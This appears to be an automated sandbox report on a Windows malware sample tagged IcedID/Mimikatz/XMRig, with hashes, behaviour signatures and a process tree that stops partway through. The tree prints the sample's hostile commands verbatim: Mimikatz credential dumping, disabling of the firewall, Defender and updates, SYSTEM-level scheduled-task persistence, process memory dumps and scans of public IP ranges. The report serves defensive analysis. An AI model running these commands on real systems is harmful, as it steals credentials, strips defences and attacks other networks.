Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2024 22:44

General

  • Target

    2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    554bbfd67dd3b2945d26bbe00df15d8e

  • SHA1

    b88199b2077375fa2678293ba37b6def0b169880

  • SHA256

    05f391b4bbebdcd4786f8a36949ca14c54b8556fd775bb78b75a006b07a74a44

  • SHA512

    697d989e57be85be2f2490bff506c4fcbedc8ff47e40c1e4f13f290715879c17cdcded62d295e1fa89eb661567c91f4f9b3931430e0048747617b6a6ea629e2c

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29270) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 41 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 4 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1480
      • C:\Windows\TEMP\zvdyymgmt\bdsrqq.exe
        "C:\Windows\TEMP\zvdyymgmt\bdsrqq.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2388
    • C:\Users\Admin\AppData\Local\Temp\2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ksiccivu\ccpdlve.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:4060
        • C:\Windows\ksiccivu\ccpdlve.exe
          C:\Windows\ksiccivu\ccpdlve.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:972
    • C:\Windows\ksiccivu\ccpdlve.exe
      C:\Windows\ksiccivu\ccpdlve.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:468
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2716
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:216
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:116
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2828
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:1656
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:1984
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:4756
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:1340
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\gaticbubi\hqrukubte\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1128
                          • C:\Windows\gaticbubi\hqrukubte\wpcap.exe
                            C:\Windows\gaticbubi\hqrukubte\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:2980
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4428
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2664
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:388
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:4420
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4888
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:3960
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:4204
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:3276
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2808
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:3348
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:5084
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:4124
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:4344
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:3732
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\gaticbubi\hqrukubte\lyctniemu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gaticbubi\hqrukubte\Scant.txt
                                                2⤵
                                                  PID:5008
                                                  • C:\Windows\gaticbubi\hqrukubte\lyctniemu.exe
                                                    C:\Windows\gaticbubi\hqrukubte\lyctniemu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gaticbubi\hqrukubte\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:3192
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\gaticbubi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gaticbubi\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:2872
                                                  • C:\Windows\gaticbubi\Corporate\vfshost.exe
                                                    C:\Windows\gaticbubi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2488
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wsiciplmi" /ru system /tr "cmd /c C:\Windows\ime\ccpdlve.exe"
                                                  2⤵
                                                    PID:2240
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:5040
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "wsiciplmi" /ru system /tr "cmd /c C:\Windows\ime\ccpdlve.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:4532
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cieehieql" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ksiccivu\ccpdlve.exe /p everyone:F"
                                                      2⤵
                                                        PID:428
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:888
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "cieehieql" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ksiccivu\ccpdlve.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:996
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mrquzuriq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zvdyymgmt\bdsrqq.exe /p everyone:F"
                                                          2⤵
                                                            PID:4036
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:3696
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "mrquzuriq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zvdyymgmt\bdsrqq.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:4392
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:2408
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:4780
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:2952
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:3136
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:3984
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:4512
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:2280
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:1816
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:1532
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:2064
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:2816
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:4344
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:5012
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:3908
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:3160
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:2708
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:1108
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:116
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2024
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:692
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:5096
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:2440
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:4836
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:2308
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:3020
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:2336
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:4752
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:528
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:4452
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:760
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:2168
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3476
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:3212
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:428
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:3664
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:8
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 780 C:\Windows\TEMP\gaticbubi\780.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3224
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:3500
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 1020 C:\Windows\TEMP\gaticbubi\1020.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1080
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 1480 C:\Windows\TEMP\gaticbubi\1480.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1276
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 2596 C:\Windows\TEMP\gaticbubi\2596.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1888
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 2740 C:\Windows\TEMP\gaticbubi\2740.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3052
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 2776 C:\Windows\TEMP\gaticbubi\2776.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4748
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 3104 C:\Windows\TEMP\gaticbubi\3104.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4864
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 3860 C:\Windows\TEMP\gaticbubi\3860.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:372
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 3952 C:\Windows\TEMP\gaticbubi\3952.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5096
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 4016 C:\Windows\TEMP\gaticbubi\4016.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5040
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 864 C:\Windows\TEMP\gaticbubi\864.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5044
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 4384 C:\Windows\TEMP\gaticbubi\4384.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4432
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 4396 C:\Windows\TEMP\gaticbubi\4396.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2056
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 1548 C:\Windows\TEMP\gaticbubi\1548.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2520
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 4004 C:\Windows\TEMP\gaticbubi\4004.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5084
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 3744 C:\Windows\TEMP\gaticbubi\3744.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4976
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 4332 C:\Windows\TEMP\gaticbubi\4332.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3160
                                                                                                                        • C:\Windows\TEMP\gaticbubi\mgysqpebq.exe
                                                                                                                          C:\Windows\TEMP\gaticbubi\mgysqpebq.exe -accepteula -mp 2120 C:\Windows\TEMP\gaticbubi\2120.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4748
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\gaticbubi\hqrukubte\scan.bat
                                                                                                                          2⤵
                                                                                                                            PID:3560
                                                                                                                            • C:\Windows\gaticbubi\hqrukubte\pgzmutric.exe
                                                                                                                              pgzmutric.exe TCP 89.149.0.1 89.149.255.255 7001 512 /save
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:4364
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:1204
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:5136
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:3552
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:2816
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:2416
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:1744
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5212
                                                                                                                                      • C:\Windows\SysWOW64\meouau.exe
                                                                                                                                        C:\Windows\SysWOW64\meouau.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:728
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ccpdlve.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:3036
                                                                                                                                          • C:\Windows\ime\ccpdlve.exe
                                                                                                                                            C:\Windows\ime\ccpdlve.exe
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2572
                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ksiccivu\ccpdlve.exe /p everyone:F
                                                                                                                                          1⤵
                                                                                                                                            PID:3544
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                              2⤵
                                                                                                                                                PID:2628
                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                cacls C:\Windows\ksiccivu\ccpdlve.exe /p everyone:F
                                                                                                                                                2⤵
                                                                                                                                                  PID:4728
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\zvdyymgmt\bdsrqq.exe /p everyone:F
                                                                                                                                                1⤵
                                                                                                                                                  PID:4364
                                                                                                                                                  • C:\Windows\system32\cmd.exe
